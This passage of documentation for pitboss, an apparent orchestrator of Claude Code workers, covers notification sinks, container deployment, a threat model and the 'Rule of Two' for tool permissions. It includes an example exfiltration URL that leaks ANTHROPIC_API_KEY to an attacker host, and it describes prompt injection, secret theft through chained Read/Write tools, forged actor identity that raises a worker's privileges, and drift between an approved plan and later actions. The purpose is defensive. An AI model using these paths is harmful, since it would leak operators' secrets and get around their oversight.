| run_finished | Info | The dispatch completes (all tasks settled or cancelled) |
| budget_exceeded | Critical | A spawn_worker or spawn_sublead fails due to budget exhaustion |
Severity filtering
The optional `severity_min` field filters by the event’s declared severity (not a per-sink override — each event has a fixed severity). Ordering is `info < warning < error < critical`. The default is `"info"` (emit everything).
For example, `severity_min = "warning"` on a Discord sink skips `run_finished` (Info) but delivers `approval_request` (Warning) and `budget_exceeded` (Critical).
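The filter reduces to a single ordered comparison. A sketch of the idea (the enum and function names are illustrative, not the pitboss source):

```rust
// Deriving Ord on a Rust enum orders variants by declaration order,
// which gives info < warning < error < critical for free.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
enum Severity {
    Info,
    Warning,
    Error,
    Critical,
}

fn should_emit(event: Severity, severity_min: Severity) -> bool {
    event >= severity_min
}

fn main() {
    // severity_min = "warning": Info events are skipped,
    // Warning and Critical events are delivered.
    assert!(!should_emit(Severity::Info, Severity::Warning));
    assert!(should_emit(Severity::Warning, Severity::Warning));
    assert!(should_emit(Severity::Critical, Severity::Warning));
}
```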
Delivery semantics
- Notifications fire asynchronously via `tokio::spawn` — they don’t block the dispatch.
- Failed deliveries are retried up to 3 times with exponential backoff (100ms → 300ms → 900ms).
- An LRU dedup cache (size 64) prevents retry storms for the same event. The dedup key is `{run_id}:{event_kind}[:{discriminator}]` (the discriminator is `request_id` for approval events, `"first"` for budget exceeded).
- Delivery failures are logged via `tracing::error!` with the sink id and dedup key. The dispatcher continues regardless — notification failures never fail a run.
- Per-attempt HTTP timeout: 30 seconds.
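The dedup-key shape and retry schedule above can be sketched in a few lines; the function names and shapes here are assumptions for illustration, not the pitboss internals:

```rust
// Dedup key: {run_id}:{event_kind}[:{discriminator}]
fn dedup_key(run_id: &str, event_kind: &str, discriminator: Option<&str>) -> String {
    match discriminator {
        Some(d) => format!("{run_id}:{event_kind}:{d}"),
        None => format!("{run_id}:{event_kind}"),
    }
}

// 100ms → 300ms → 900ms: base delay of 100ms, tripling per attempt.
fn backoff_ms(attempt: u32) -> u64 {
    100 * 3u64.pow(attempt)
}

fn main() {
    assert_eq!(
        dedup_key("run-1", "approval_request", Some("req-42")),
        "run-1:approval_request:req-42"
    );
    assert_eq!(dedup_key("run-1", "run_finished", None), "run-1:run_finished");
    assert_eq!((0..3).map(backoff_ms).collect::<Vec<_>>(), vec![100, 300, 900]);
}
```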
Env-var substitution
URLs support ${PITBOSS_VAR_NAME} substitution from the process environment. This keeps webhook URLs (which are themselves secrets — anyone with the URL can post to the channel) out of manifest files that might be committed to git:
```toml
[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["run_finished"]
```
As of v0.7.1, only env vars whose names start with `PITBOSS_` may be substituted. This closes an exfiltration vector where a rogue manifest could write `url = "https://attacker/?t=${ANTHROPIC_API_KEY}"` and leak any host env var to a chosen webhook. Unprefixed names fail loudly at validate time rather than silently reaching through to `std::env::var`.
If you were using an unprefixed var name in older manifests, rename it in your shell init (or deployment config):
```shell
# Before
export SLACK_WEBHOOK_URL="https://hooks.slack.com/..."

# After (v0.7.1+)
export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/..."
```
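The prefix rule itself is a simple name check done before any environment lookup. A minimal sketch (function name and error wording are assumptions):

```rust
// Substitution names must start with PITBOSS_; anything else fails loudly
// at validate time instead of being resolved from the host environment.
fn check_substitution_name(name: &str) -> Result<(), String> {
    if name.starts_with("PITBOSS_") {
        Ok(())
    } else {
        Err(format!(
            "refusing to substitute ${{{name}}}: only PITBOSS_-prefixed env vars are allowed"
        ))
    }
}

fn main() {
    assert!(check_substitution_name("PITBOSS_SLACK_WEBHOOK_URL").is_ok());
    assert!(check_substitution_name("ANTHROPIC_API_KEY").is_err());
}
```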
Webhook URL validation (v0.7.1+)
Beyond the env-var prefix, all webhook / slack / discord URLs are validated at manifest load:
- Scheme must be `https://`. `http://`, `file://`, and other non-https schemes are rejected.
- Host must not resolve to a loopback, private, link-local, unspecified, broadcast, CGNAT (`100.64.0.0/10`), IPv6 ULA (`fc00::/7`), or IPv6 link-local (`fe80::/10`) address. IPv4-mapped IPv6 (`::ffff:127.0.0.1`) is also rejected.
- Hostnames like `localhost` and `*.localhost` are blocked by name.
If you need to post to an internal service for development, the workaround is to route through a public relay (e.g. an ngrok tunnel) — pitboss will not speak directly to a private address.
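The address classes listed above can be checked with the standard library alone. This is an illustrative re-implementation, not the validator pitboss actually ships, and it may differ in detail:

```rust
use std::net::IpAddr;

// Reject addresses in the blocked ranges described above.
fn ip_is_blocked(ip: IpAddr) -> bool {
    match ip {
        IpAddr::V4(v4) => {
            let o = v4.octets();
            v4.is_loopback()
                || v4.is_private()
                || v4.is_link_local()
                || v4.is_unspecified()
                || v4.is_broadcast()
                // CGNAT 100.64.0.0/10: first octet 100, top two bits of second octet == 01
                || (o[0] == 100 && (o[1] & 0xC0) == 0x40)
        }
        IpAddr::V6(v6) => {
            // IPv4-mapped IPv6 (::ffff:a.b.c.d) is judged by its IPv4 rules.
            if let Some(mapped) = v6.to_ipv4_mapped() {
                return ip_is_blocked(IpAddr::V4(mapped));
            }
            let s0 = v6.segments()[0];
            v6.is_loopback()
                || v6.is_unspecified()
                || (s0 & 0xfe00) == 0xfc00 // ULA fc00::/7
                || (s0 & 0xffc0) == 0xfe80 // link-local fe80::/10
        }
    }
}

fn main() {
    assert!(ip_is_blocked("127.0.0.1".parse().unwrap()));
    assert!(ip_is_blocked("10.0.0.1".parse().unwrap()));
    assert!(ip_is_blocked("100.64.0.1".parse().unwrap()));
    assert!(ip_is_blocked("::ffff:127.0.0.1".parse().unwrap()));
    assert!(ip_is_blocked("fe80::1".parse().unwrap()));
    assert!(!ip_is_blocked("93.184.216.34".parse().unwrap()));
}
```

Note the recursion for IPv4-mapped addresses: without it, `::ffff:127.0.0.1` would slip past checks that only look at IPv4 literals.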
Discord sink: markdown and mention safety (v0.7.1+)
The Discord sink escapes markdown and mention characters (`* _ ~ \ | > # [ ] ( ) @ < :`) in untrusted fields (`request_id`, `task_id`, `summary`, `run_id`, `source`) before embedding them in the Discord description. Each payload also sets `allowed_mentions: { parse: [] }` so Discord doesn’t resolve `@everyone` / `@here` / user / role / channel mentions even if one sneaks past the escaping.
Slack sink parallel hardening is a known roadmap item — until it lands, avoid routing untrusted content (task summaries from external sources) through Slack.
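The escaping step amounts to backslash-prefixing each metacharacter. A hedged sketch of the idea, assuming the character set listed above (the actual escaper in pitboss may differ):

```rust
// Backslash-escape Discord markdown/mention metacharacters in an
// untrusted field before it is embedded in an embed description.
fn escape_discord(untrusted: &str) -> String {
    let mut out = String::with_capacity(untrusted.len());
    for c in untrusted.chars() {
        if "*_~\\|>#[]()@<:".contains(c) {
            out.push('\\');
        }
        out.push(c);
    }
    out
}

fn main() {
    assert_eq!(escape_discord("@everyone"), "\\@everyone");
    assert_eq!(escape_discord("**bold**"), "\\*\\*bold\\*\\*");
    assert_eq!(escape_discord("plain text"), "plain text");
}
```

Escaping plus `allowed_mentions: { parse: [] }` is belt-and-suspenders: either layer alone would miss edge cases the other catches.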
For the canonical notification schema reference, see AGENTS.md in the source tree.
Running Pitboss with docker-compose
Compose files for the common deployment shapes. All examples work with `podman compose` or `docker compose` unchanged — the files below use plain Compose v2 syntax with no Docker-specific extensions.
If you haven’t yet: pull the image once.
```shell
podman pull ghcr.io/sds-mode/pitboss:latest
```
Shared prerequisites
- Host auth: `claude login` has been run on the host at least once, so `~/.claude/.credentials.json` exists. This file gets bind-mounted into every example.
- Host `claude` binary: until the `pitboss-with-claude` variant ships (v0.7+ — see Using Claude in a container once PR2 lands), operators using the bare `pitboss` image also mount their host’s `claude` binary. Find it with:

  ```shell
  which claude
  # typical: /usr/local/bin/claude                 (npm global)
  #          ~/.claude/local/claude-bundle/claude  (Anthropic installer)
  ```

  The examples assume `/usr/local/bin/claude`. Adjust if yours differs.
- SELinux hosts (Fedora/RHEL/Rocky) need `:z` on bind mounts — the examples include it. It’s a no-op on Ubuntu/Debian.
- UID alignment: set `UID`/`GID` env vars before running compose so the container process matches your host user and mounted files stay writable:

  ```shell
  export UID=$(id -u)
  export GID=$(id -g)
  ```
Example 1 — One-shot headless dispatch
Fires off a dispatch and exits. Good for CI, cron jobs, “run this manifest against this repo and email me when done” scripts.
Project layout:
```
my-project/
├── docker-compose.yml
├── manifest.toml
├── repo/   # your target git repo
└── runs/   # created on first run; pitboss writes here
```
docker-compose.yml:
```yaml
services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      # Host auth (OAuth tokens). Read-write: claude rotates tokens.
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      # Host claude binary. Remove once pitboss-with-claude ships.
      - /usr/local/bin/claude:/usr/local/bin/claude:ro
      # Manifest + target repo + run-output dir.
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z
```
Run it:
```shell
podman compose up                            # stream logs, exit when done
docker compose up --abort-on-container-exit  # if using docker compose
```
Inspect the run afterward:
```shell
ls runs/                             # one directory per run-id
cat runs/<run-id>/summary.json | jq
```
Example 2 — Long-running dispatch + TUI attached
Use when you want the TUI’s live floor view while a hierarchical run is in flight. Two services share the run-state directory; the TUI runs attached to a TTY.
docker-compose.yml:
```yaml
x-pitboss-env: &pitboss-env
  user: "${UID:-1000}:${GID:-1000}"
  working_dir: /workspace

services:
  dispatch:
    <<: *pitboss-env
    image: ghcr.io/sds-mode/pitboss:latest
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      - /usr/local/bin/claude:/usr/local/bin/claude:ro
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - pitboss-runs:/home/pitboss/.local/share/pitboss
  tui:
    <<: *pitboss-env
    image: ghcr.io/sds-mode/pitboss:latest
    command: pitboss-tui
    tty: true
    stdin_open: true
    depends_on:
      - dispatch
    volumes:
      - pitboss-runs:/home/pitboss/.local/share/pitboss:rw

volumes:
  pitboss-runs:
```
Run with:
```shell
podman compose up -d dispatch   # start dispatch in background
podman compose run --rm tui     # attach TUI to a TTY
```
The TUI process exits when you press `q`; the dispatch keeps running in the background. Run `podman compose down` when the dispatch finishes (or earlier, to cancel).
Shared volume note: `pitboss-runs` is a named volume rather than a host bind mount so both services see the same state dir without SELinux label juggling. If you want the runs on the host filesystem, swap it for `./runs:/home/pitboss/.local/share/pitboss:rw,z` in both services.
Example 3 — Headless dispatch with webhook notifications
Same as Example 1, but the manifest is wired to fire a Slack webhook when an approval is pending or the run finishes. Useful for long-running batch work where you want the run to continue autonomously but still get poked when it ends or needs you.
manifest.toml:
```toml
[run]
max_workers = 6
budget_usd = 2.00
lead_timeout_secs = 3600
approval_policy = "block"

[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"
events = ["approval_pending", "run_finished"]
severity_min = "info"

[[lead]]
id = "main"
directory = "/workspace"
prompt = "..."
```
docker-compose.yml:
```yaml
services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    environment:
      # Notification webhook env vars must be `PITBOSS_`-prefixed — pitboss
      # only substitutes `${VAR}` tokens into notification URLs when the
      # name starts with `PITBOSS_`, so host secrets can't be exfiltrated
      # by a rogue manifest.
      PITBOSS_SLACK_WEBHOOK_URL: ${PITBOSS_SLACK_WEBHOOK_URL}
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      - /usr/local/bin/claude:/usr/local/bin/claude:ro
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z
```
Run with the webhook URL in the shell environment:
```shell
export PITBOSS_SLACK_WEBHOOK_URL="https://hooks.slack.com/services/..."
podman compose up
```
The `${VAR}` substitution in `manifest.toml` is done by pitboss itself at dispatch time, so the env var flows: shell → compose `environment:` → container env → pitboss → manifest. Only names starting with `PITBOSS_` are substituted; `${ANTHROPIC_API_KEY}` or `${AWS_SECRET}` in a webhook URL would be refused at load time. Webhook URLs must also be `https://` and must not resolve to a loopback, private, link-local, or CGNAT address.
Example 4 — pitboss-with-claude variant (v0.7+)
Once the bundled variant ships (PR2 of the 2-PR sequence adding `ghcr.io/sds-mode/pitboss-with-claude`), drop the host-claude bind mount and switch the image name:
```yaml
services:
  pitboss:
    image: ghcr.io/sds-mode/pitboss-with-claude:latest
    user: "${UID:-1000}:${GID:-1000}"
    working_dir: /workspace
    command: pitboss dispatch /run/pitboss.toml
    volumes:
      - ${HOME}/.claude:/home/pitboss/.claude:rw,z
      # No host-claude mount needed — claude is bundled at a pinned version.
      - ./manifest.toml:/run/pitboss.toml:ro
      - ./repo:/workspace:rw,z
      - ./runs:/home/pitboss/.local/share/pitboss:rw,z
```
Troubleshooting
“claude: command not found” inside the container. The host-binary mount path doesn’t match where your `claude` is installed. Run `which claude` on the host and update the `/usr/local/bin/claude` line in the compose file.
“Permission denied” reading `.credentials.json`. UID mismatch between the container process and the mounted file. Make sure `UID` and `GID` are exported in your shell before `podman compose up`.
Worker worktrees fail with “repository is dirty”. The bind mount at `/workspace` points at a repo with uncommitted changes, and `use_worktree = true` (the default) wants a clean tree. Either commit first, or set `use_worktree = false` in `[defaults]` for read-only analysis runs.
SELinux AVC denials in the host audit log. Add `,z` to the bind mount flags (`./repo:/workspace:rw,z`). The `z` label tells SELinux the mount is shared across containers and host, applying a compatible context.
Rootless podman + `:z` label. Rootless podman can’t write SELinux labels on directories it doesn’t own. Workaround: run `chcon -Rt container_file_t ./runs ./repo` once as a privileged user, or use named volumes (Example 2’s pattern).
See also
- Using Claude in a container (available in v0.7+)
- Notifications — full `[[notification]]` sink reference
- TUI — operator-side TUI guide
Using Claude in a container
Pitboss ships two container images:
| Image | What’s inside | When to use |
|---|---|---|
| ghcr.io/sds-mode/pitboss | Pitboss binaries only | You want to mount or install claude yourself, or you’re layering pitboss into an existing base image. |
| ghcr.io/sds-mode/pitboss-with-claude | Pitboss + pinned Claude Code CLI | You want a self-contained image you can pull and run. |
Both images are multi-arch (linux/amd64 + linux/arm64) and follow the same tag scheme (`:latest`, semver tags, `:main`).
The bundled image pins a specific Claude Code version. To check it at runtime:
```shell
podman inspect ghcr.io/sds-mode/pitboss-with-claude:latest \
  --format '{{index .Config.Labels "ai.anthropic.claude-code.version"}}'
```
Linux host: mount ~/.claude
Claude Code on Linux stores OAuth tokens at `~/.claude/.credentials.json`. The bundled container reads credentials from `/home/pitboss/.claude` (via `CLAUDE_CONFIG_DIR`), so bind-mounting your host’s `~/.claude` just works:
```shell
# One-time on the host:
claude login

# Every pitboss run:
podman run --rm --userns=keep-id \
  -v "$HOME/.claude:/home/pitboss/.claude:rw,z" \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro,z" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml
```
Why `--userns=keep-id`?
Rootless podman runs the container in a user namespace. Without `--userns=keep-id`, your host UID 1000 maps to in-container UID 0 (fake root), and the bundled pitboss user (container UID 1000) maps to a different host subuid — the mounted credentials look root-owned to the in-container pitboss user and become unreadable. `--userns=keep-id` aligns the mapping so host UID 1000 maps directly to container UID 1000.
If you’re running Docker instead of rootless podman, skip the flag: Docker doesn’t use user namespaces by default, so mounted files’ UIDs pass through unchanged. Use `-u "$(id -u):$(id -g)"` there if your host UID isn’t 1000.
Why the `:z` flag?
On SELinux-enforcing distros (Fedora, RHEL, CentOS, Rocky), a bind mount without a label is unreadable from the container. The `:z` flag tells podman/docker to apply a shared SELinux label so the container can read the mount. Ubuntu and Debian operators can omit it.
Important: ALL bind mounts need `:z`, not just `~/.claude`. Missing `:z` on the manifest mount is a common footgun — it produces a cryptic `Permission denied (os error 13)` from pitboss at manifest-read time.
macOS host: Keychain can’t be mounted
On macOS, `claude` stores OAuth tokens in the system Keychain — not in `~/.claude/`. The Keychain isn’t mountable into a container. Two fallbacks:
Option A: API key
If you have a standalone Anthropic API key (pay-as-you-go, separate from a Claude subscription):
```shell
docker run --rm \
  -e ANTHROPIC_API_KEY="$ANTHROPIC_API_KEY" \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml
```
Option B: Persistent named volume
Run `claude login` inside the container once to authenticate via OAuth, store the result in a named volume, then reuse that volume for subsequent runs:
```shell
# One-time: interactive login inside a persistent volume
docker volume create pitboss-claude-auth
docker run --rm -it \
  -v pitboss-claude-auth:/home/pitboss/.claude \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  claude login

# Every run:
docker run --rm \
  -v pitboss-claude-auth:/home/pitboss/.claude \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml
```
Podman vs Docker
`podman run` and `docker run` with the arguments above behave equivalently for pitboss’s purposes. Key differences operators hit:
- Rootless podman uses user namespaces → needs `--userns=keep-id` (see above).
- Docker by default creates iptables rules that bypass UFW on Linux hosts. Podman’s netavark/slirp4netns stack respects the host firewall.
- SELinux: both honor the `:z`/`:Z` mount flags identically.

We recommend podman for Linux operators who care about firewall enforcement; Docker is simpler for macOS (Docker Desktop) and Windows (WSL2 backend).
Updating the bundled Claude version
The bundled image pins a specific Claude Code version in CI. To consume a newer version:
- Open an issue or PR at https://github.com/SDS-Mode/pitboss to bump `CLAUDE_CODE_VERSION` in `.github/workflows/container.yml`.
- Once merged, a new container release rebuilds with the updated version.
For local/one-off use with a different version:
```shell
podman build --target=with-claude \
  --build-arg CLAUDE_CODE_VERSION=<version> \
  -t pitboss-with-claude:custom .
```
Troubleshooting
“Not logged in” / auth error
Check on the host: `claude --version` should work and `~/.claude/.credentials.json` should exist. If the file is missing, run `claude login` on the host.
“Permission denied” reading credentials in rootless podman
Add `--userns=keep-id`. Rootless podman’s default UID namespace maps host UID to in-container UID 0 — see the “Why `--userns=keep-id`?” section.
“Permission denied (os error 13)” reading the manifest
The manifest bind mount is missing `:z`. Add it: `-v "$PWD/manifest.toml:/run/pitboss.toml:ro,z"`. All bind mounts on SELinux-enforcing hosts need `:z`, not just `~/.claude`.
SELinux AVC denials in the host audit log
Same cause as above — bind mounts need `:z` or `:Z`. `:z` applies a shared label (compatible across containers); `:Z` applies a private label (prevents other containers from reading the same mount).
Token refresh failure after a long-running dispatch
OAuth tokens rotate. If the container started with a valid token that expired mid-run, the refresh write-back needs UID alignment (`--userns=keep-id` on rootless podman, or a matching `-u` on Docker). Re-run with the correct flag.
Threat model
This page frames pitboss’s attack surface honestly. It is aimed at operators evaluating whether pitboss fits a security-sensitive deployment, and at leads designed to process external content.
What pitboss is
Pitboss is an orchestrator. It:
- Spawns `claude` subprocesses, one per worker or lead, with a specific prompt and tool set.
- Captures their stream-JSON output, persists structured artifacts per run, and exposes a small MCP server on a Unix domain socket.
- In hierarchical mode, lets a lead dynamically spawn additional workers and sub-leads at runtime.
That is the complete list. Pitboss is not a sandbox, not a content filter, not an identity provider.
What pitboss is NOT
Not a runtime jail. If a worker is given `Bash` in its tools list, it can run arbitrary shell commands as the OS user that launched pitboss. Pitboss does not interpose on subprocess execution, does not apply seccomp profiles, and does not restrict filesystem access beyond what the OS already enforces.
Not an auth/identity provider. The MCP socket is unauthenticated. Pitboss assumes the only process connecting to the MCP socket is the claude subprocess it spawned. There is no per-request credential, no session token, no verification that the connecting client is the expected worker. Do not expose the MCP socket to other processes.
Not a content filter. Pitboss does not inspect what a worker reads, what it writes, or what it outputs. If a worker’s Bash call exfiltrates data to an external endpoint, pitboss will faithfully log the command in stdout.log after the fact — it will not prevent it.
Not an egress firewall. Pitboss makes no network-level restrictions on what the host or workers can contact. Workers with Bash or WebFetch can reach any endpoint reachable from the host.
Risks specific to LLM-orchestrated work
Prompt injection
A worker that reads external content — web pages, user-submitted documents, output from a previous worker that itself processed untrusted input — is exposed to prompt injection. Malicious content in that input can manipulate the worker’s subsequent behavior.
The severity depends on the worker’s tool set:
- Read-only tools only — an injected instruction can cause the worker to produce a misleading report. The damage is informational.
- Write or Edit tools — an injected instruction can cause the worker to modify files on the operator’s filesystem.
- Bash — an injected instruction can cause the worker to run arbitrary shell commands. There is no pitboss-level defense against this. Mitigation is tool restriction: workers that process untrusted input should not have `Bash`.
Pitboss does not prevent prompt injection. The mitigation available to operators is scoping tool permissions so that a successfully injected worker cannot take state-changing actions. See The Rule of Two for the framework and Defense-in-depth patterns for concrete manifest recipes.
Runaway cost
A misbehaving lead — whether from a model error, a prompt-injected instruction, or a bug in the lead’s own prompt — can spawn workers continuously. The `budget_usd` and `max_workers` fields on `[run]` and per-sublead envelopes are the primary defense. Without them, cost is unbounded. The `budget_usd` cap is enforced via reservation accounting: `spawn_worker` fails before launch once `spent + reserved + next_estimate > budget`.
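The reservation check is a single guard evaluated before any subprocess is launched. A sketch of the accounting, with field and method names as assumptions:

```rust
// Reservation accounting: a spawn is refused before launch once
// spent + reserved + next_estimate would exceed the cap.
struct Budget {
    cap_usd: f64,
    spent: f64,
    reserved: f64,
}

impl Budget {
    fn try_reserve(&mut self, next_estimate: f64) -> bool {
        if self.spent + self.reserved + next_estimate > self.cap_usd {
            false // spawn_worker fails; no subprocess is launched
        } else {
            self.reserved += next_estimate;
            true
        }
    }
}

fn main() {
    let mut b = Budget { cap_usd: 1.0, spent: 0.0, reserved: 0.0 };
    assert!(b.try_reserve(0.5));  // within the cap; 0.5 is now reserved
    assert!(!b.try_reserve(0.6)); // 0.0 + 0.5 + 0.6 > 1.0, refused
}
```

Reserving the estimate up front is what prevents the race where several concurrent spawns each individually fit under the cap but collectively exceed it.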
Capability escalation through chained tools
A worker with `Read` and `Write` can be tricked into discovering secrets in one location and writing them to another. A worker that reads `~/.ssh/id_rsa` and writes to a world-readable output directory has effectively exfiltrated a key. The worker does not need `Bash` to do this — `Read` + `Write` is sufficient.
Tool restrictions should be designed with the worst-case injected instruction in mind, not the happy-path prompt.
Sensitive data exposure through observability paths
Workers emit stream-JSON to stdout. The TUI renders live log output per worker. If a worker’s output contains sensitive content (credentials it discovered, PII from files it read), that content may appear in:
- `tasks/<id>/stdout.log` in the run directory
- The TUI’s tile grid and log pane
- Any webhook notification payloads, if notifications are configured with `include_output`
Token and cost data is reported in stream-JSON for every worker. Operators should treat run directories as potentially sensitive artifacts.
Plan-to-action drift
When `require_plan_approval = true`, a lead must have a `propose_plan` approved before `spawn_worker` calls are permitted. However, the approval gates the plan text, not every subsequent action. The lead can behave differently when actually spawning workers than it described in the plan. Approval is a checkpoint, not a binding constraint. Operators who need tighter control over individual spawns should use `request_approval` calls before significant actions, not just `propose_plan`.
What is in your trust boundary
The following are inside your trust boundary as operator:
- The `claude` binary and Anthropic’s API. Pitboss trusts the output of `claude` subprocesses to be honest (not itself adversarial).
- The host you run pitboss on, including the filesystem, environment variables, and network stack.
- The manifest you write. Pitboss executes it as specified; it does not attempt to validate that your prompts are safe.
- Any HTTP endpoints configured in `[[notification]]` sections. Pitboss will POST to them; ensure they are trusted and require no authentication that you’d rather not expose in the manifest.
Internal trust surfaces
Pitboss has two processes that talk to each other over an unauthenticated Unix domain socket:
- The dispatcher (`pitboss dispatch`). Holds run state, routes MCP tool calls to the correct layer, enforces policy.
- The MCP bridge (`pitboss mcp-bridge <socket>`). A small stdio↔socket adapter invoked by `claude` via `--mcp-config`. Stamps each incoming MCP request with a `_meta` field describing which actor (root lead, sub-lead, worker) originated it.
The dispatcher trusts the bridge’s `_meta.actor_id` and `_meta.actor_role` fields. These values are used as index keys into layer-routing maps (`subleads`, `worker_layer_index`) and as the basis for `ActorPath` on approval requests. This has two consequences:
If the bridge is compromised, actor identity is forgeable
An attacker with the ability to inject MCP requests over the dispatcher’s socket — or to replace the `pitboss mcp-bridge` binary before it starts — can stamp arbitrary `actor_id` / `actor_role` pairs. The dispatcher will route those requests as if they came from that actor. Concretely, a compromised bridge can:
- Elevate a worker to a sub-lead. A worker-originated request stamped as `actor_role = "sublead"` bypasses the depth-2 spawn cap (workers are terminal; sub-leads can spawn more workers).
- Cross-tree access. A sub-tree worker stamped with a peer sub-lead’s `actor_id` can read `/peer/<peer>/*` entries it is not supposed to see.
- Approval redirection. Approval requests are routed by `actor_path`; a mislabeled approval will surface to the operator under the wrong originator, potentially misleading approve/reject decisions.
Mitigations currently in place
- Socket permissions. The dispatcher creates the MCP socket with restrictive permissions (owner-only) in the run directory, which is typically under `~/.local/share/pitboss/runs/<run-id>/`. Any process running as your host user can still connect; a process running as a different user cannot.
- Role-shape validation. The dispatcher rejects syntactically invalid `_meta` payloads (e.g. `actor_role = "sublead"` without a matching registered `actor_id`), which closes some but not all misuse paths.
- Worker-sent requests that target sub-lead-only tools are rejected regardless of `_meta`, because sub-lead-only tools are not in the worker’s `--allowedTools` list passed to the claude subprocess.
What is NOT mitigated
- A bridge binary replaced on disk before the dispatcher invokes it. Verify the binary path you configure in any shared-tooling setup.
- A local attacker with the same UID as the pitboss process. Pitboss assumes single-user-on-host; multi-tenant deployments require an external wrapper.
Planned hardening (tracked for a future phase)
- Bridge-auth secret. A per-run secret the dispatcher generates, passes to the bridge at launch via a non-inherited channel, and requires the bridge to HMAC over `_meta` fields. Would cryptographically prevent forged identities from an unauthenticated connector even if an attacker reaches the socket.
Operators deploying pitboss in security-sensitive contexts should treat the bridge and dispatcher as a single trust unit and harden the host boundary (single-user host, restricted OS account, standard filesystem permissions on the runs directory) rather than relying on internal checks.
What pitboss does not provide (operator responsibilities)
| Gap | Operator action |
|---|---|
| Egress filtering | Firewall the host. Pitboss workers have full network access if Bash or WebFetch are allowed. |
| Per-tool-invocation audit log | Pitboss produces one TaskRecord per worker (in summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation, you need a wrapper or a Claude-level audit hook. |
| Argument validation on tool calls | --allowedTools restricts which tools a worker may call, but not the arguments. A worker with Write can write to any path writable by the pitboss process user. |
| Secrets management | Do not put API keys or credentials in the manifest. Use env vars in [defaults].env or source them from the environment. The manifest is written verbatim to manifest.snapshot.toml in the run directory. |
| Identity / multi-tenancy | Pitboss assumes the operator is the only authenticated user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper. |
Next: The Rule of Two — a framework for scoping worker tool permissions based on what each worker processes and touches.
The Rule of Two
The Rule of Two is a recognized pattern in AI agent design: an agent should hold AT MOST TWO of the following three properties at once:
- (A) Untrusted input — the agent reads content that was not authored by the operator.
- (B) Sensitive data access — the agent can read secrets, customer PII, internal-only documents, or anything the operator would not post publicly.
- (C) State-changing actions — the agent can take actions that modify state outside its own conversation: writing files, running shell commands, calling external APIs, sending notifications.
Each pair has known failure modes. All three together is unsafe by default.
This page applies the Rule of Two to pitboss manifest design.
Defining the terms in pitboss context
Untrusted input is anything a worker reads that the operator did not author:
- External documents or web pages retrieved via `WebFetch`
- User-submitted content passed via the prompt or a shared-store entry
- The output of another worker that itself processed untrusted input (injection can propagate through worker chains)
- Files in a repository where external contributors have write access
Sensitive data is any information that should not be publicly visible:
- Credentials and API keys (even if stored as env vars, a worker with `Read` could discover them if they’re also present in files)
- Customer or user PII
- Internal architecture documents, unreleased roadmap data, proprietary source code
- Anything the operator would not include in a public bug report
State-changing actions in pitboss correspond to specific tool grants:
- `Write`, `Edit`, `NotebookEdit` — modify files on the operator’s filesystem
- `Bash` — run arbitrary shell commands (the broadest capability; subsumes most others)
- Custom MCP tools that trigger external side effects (deploy pipelines, notification endpoints, databases)

Tool grants are set via the `tools = [...]` field on `[defaults]`, `[[task]]`, `[[lead]]`, or in the `spawn_worker` call’s `tools` argument.
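Only the state-changing leg of the rule is mechanically derivable from a tools list; the untrusted-input and sensitive-data flags remain the operator's judgment. A toy checker along those lines (names are illustrative, not part of pitboss):

```rust
// State-changing tools, per the list above.
fn grants_state_change(tools: &[&str]) -> bool {
    tools
        .iter()
        .any(|t| matches!(*t, "Write" | "Edit" | "NotebookEdit" | "Bash"))
}

// All three properties at once is the configuration to avoid.
fn violates_rule_of_two(untrusted_input: bool, sensitive_data: bool, tools: &[&str]) -> bool {
    untrusted_input && sensitive_data && grants_state_change(tools)
}

fn main() {
    // A + C: untrusted input, state-changing, no sensitive data — permitted.
    assert!(!violates_rule_of_two(true, false, &["WebFetch", "Read", "Write"]));
    // A + B + C: all three at once — flagged.
    assert!(violates_rule_of_two(true, true, &["Read", "Write", "Bash"]));
    // A + B: read-only evaluator — permitted.
    assert!(!violates_rule_of_two(true, true, &["Read", "Glob", "Grep"]));
}
```

This skips custom MCP tools with side effects, which the list above also counts as state-changing; a real check would need a per-tool classification supplied by the operator.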
The three permitted pairs
| Pair | What it means | Known failure mode |
|---|---|---|
| A + C (untrusted input + state-changing, no sensitive data) | Worker processes external content and can write output, but has no access to sensitive data. | Injected instructions can corrupt output files or trigger external actions; they cannot read secrets. |
| B + C (sensitive data + state-changing, no untrusted input) | Worker touches internal data and can act on it, but reads only operator-authored prompts and trusted internal data. | Bugs or model errors can cause incorrect mutations; external injection is not a path because the worker never reads untrusted content. |
| A + B (untrusted input + sensitive data, no state-changing) | Worker reads external content alongside internal data but cannot write or act. | Can produce misleading reports if injected; cannot modify state. This is the lead-as-evaluator pattern. |
A + C: untrusted input plus state-changing actions
Use this pair for workers that process external sources and write their output somewhere, but that do not need access to sensitive internal data.
```toml
[[task]]
id = "scrape-and-summarize"
